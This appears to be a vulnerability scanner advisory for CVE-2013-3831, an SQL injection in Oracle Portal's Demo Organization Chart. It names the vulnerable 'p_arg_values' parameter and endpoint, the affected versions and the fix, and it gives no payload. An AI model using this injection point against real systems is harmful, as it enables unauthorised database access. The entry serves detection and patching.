Summary
This host is running Oracle Portal Demo Organization Chart and is prone to sql injection vulnerability.
Impact
Successful exploitation will allow remote attackers to manipulate SQL queries by injecting arbitrary SQL code.
Impact Level: Application
Solution
Apply the patch from below link,
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
Insight
Input passed via the 'p_arg_values' parameter to /pls/portal/PORTAL_DEMO.ORG _CHART.SHOW is not properly sanitized before being used in a sql query.
Affected
Oracle Portal version 11.1.1.6.0 and prior.
Detection
Send a crafted exploit string via HTTP GET request and check whether it is able to read the database information or not.
References
Severity
Classification
-
CVE CVE-2013-3831 -
CVSS Base Score: 5.5
AV:N/AC:L/Au:S/C:P/I:P/A:N
Related Vulnerabilities
- Advanced Image Hosting Cross Site Scripting Vulnerability
- Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
- 11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
- Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
- An Image Gallery Directory Traversal Vulnerability